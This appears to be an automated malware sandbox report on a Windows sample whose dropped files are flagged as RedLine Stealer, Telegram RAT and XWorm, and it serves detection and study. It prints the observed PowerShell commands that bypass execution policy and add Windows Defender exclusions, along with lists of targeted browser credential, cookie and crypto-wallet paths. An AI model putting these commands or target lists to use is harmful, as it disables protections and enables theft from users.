Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Code function: 0_2_0042327E SetUnhandledExceptionFilter, 0_2_0042327E
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Code function: 0_2_0041E48E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0041E48E
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Code function: 0_2_00423D39 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind, 0_2_00423D39
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Code function: 0_2_0041FD8B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0041FD8B
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe Code function: 1_2_00007FF630CE1890 SetUnhandledExceptionFilter, 1_2_00007FF630CE1890
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe Code function: 1_2_00007FF630CE1240 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_00007FF630CE1240
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
.NET source code references suspicious native API functions
Source: wjoqZlIS.exe.0.dr, NativeHelper.cs Reference to suspicious API methods: LoadLibrary("kernel32")
Source: wjoqZlIS.exe.0.dr, NativeHelper.cs Reference to suspicious API methods: GetProcAddress(hModule, "GetConsoleWindow")
Source: YsrQekGS.exe.0.dr, Messages.cs Reference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)
Source: YsrQekGS.exe.0.dr, XLogger.cs Reference to suspicious API methods: MapVirtualKey(vkCode, 0u)
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\YsrQekGS.exe'
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\YsrQekGS.exe' Jump to behavior
Bypasses PowerShell execution policy
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\YsrQekGS.exe'
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Process created: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe "C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe" Jump to behavior
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Process created: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe "C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe" Jump to behavior
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Process created: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe "C:\Users\user\AppData\Local\Temp\YsrQekGS.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\YsrQekGS.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'YsrQekGS.exe' Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Code function: 0_2_0040C904 cpuid 0_2_0040C904
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Code function: GetLocaleInfoW,GetNumberFormatW, 0_2_0040D007
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Code function: GetLocaleInfoA, 0_2_00425CA0
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Queries volume information: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Queries volume information: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe VolumeInformation Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Queries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Queries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformation Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Queries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformation Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Queries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformation Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Queries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformation Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Queries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformation Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Queries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Code function: 0_2_00411104 GetSystemTime,SystemTimeToFileTime, 0_2_00411104
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Code function: 0_2_00409B26 GetVersionExW, 0_2_00409B26
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: YsrQekGS.exe, 00000004.00000002.2940564009.000000001C290000.00000004.00000020.00020000.00000000.sdmp, YsrQekGS.exe, 00000004.00000002.2937204022.000000001B7D4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information
barindex
Yara detected RedLine Stealer
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 2.0.wjoqZlIS.exe.900000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000000.1666359805.0000000000902000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1664010699.0000000003FCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Ekpb7jn7mf.exe PID: 6356, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wjoqZlIS.exe PID: 6528, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe, type: DROPPED
Yara detected Telegram RAT
Source: Yara match File source: Process Memory Space: YsrQekGS.exe PID: 6564, type: MEMORYSTR
Yara detected XWorm
Source: Yara match File source: 4.0.YsrQekGS.exe.4b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000000.1666725019.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2912640995.0000000002756000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1664010699.0000000003FCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Ekpb7jn7mf.exe PID: 6356, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: YsrQekGS.exe PID: 6564, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe, type: DROPPED
Found many strings related to Crypto-Wallets (likely being stolen)
Source: Ekpb7jn7mf.exe, 00000000.00000003.1664010699.0000000003FCE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ElectrumRule
Source: Ekpb7jn7mf.exe, 00000000.00000003.1664010699.0000000003FCE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: JaxxxLibertyAfihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: wjoqZlIS.exe, 00000002.00000000.1666359805.0000000000902000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
Source: Ekpb7jn7mf.exe, 00000000.00000003.1664010699.0000000003FCE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ExodusRule
Source: powershell.exe, 0000000A.00000002.1759686805.000002174EF13000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: # AutoUnlockKeyStored. Win32_EncryptableVolume::IsAutoUnlockKeyStored
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe File opened: C:\Users\user\AppData\Roaming\atomic\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe File opened: C:\Users\user\AppData\Roaming\Guarda\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\ Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 2.0.wjoqZlIS.exe.900000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000000.1666359805.0000000000902000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1664010699.0000000003FCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Ekpb7jn7mf.exe PID: 6356, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wjoqZlIS.exe PID: 6528, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe, type: DROPPED

Remote Access Functionality
barindex
Yara detected RedLine Stealer
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 2.0.wjoqZlIS.exe.900000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000000.1666359805.0000000000902000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1664010699.0000000003FCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Ekpb7jn7mf.exe PID: 6356, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wjoqZlIS.exe PID: 6528, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe, type: DROPPED
Yara detected Telegram RAT
Source: Yara match File source: Process Memory Space: YsrQekGS.exe PID: 6564, type: MEMORYSTR
Yara detected XWorm
Source: Yara match File source: 4.0.YsrQekGS.exe.4b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000000.1666725019.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2912640995.0000000002756000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1664010699.0000000003FCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
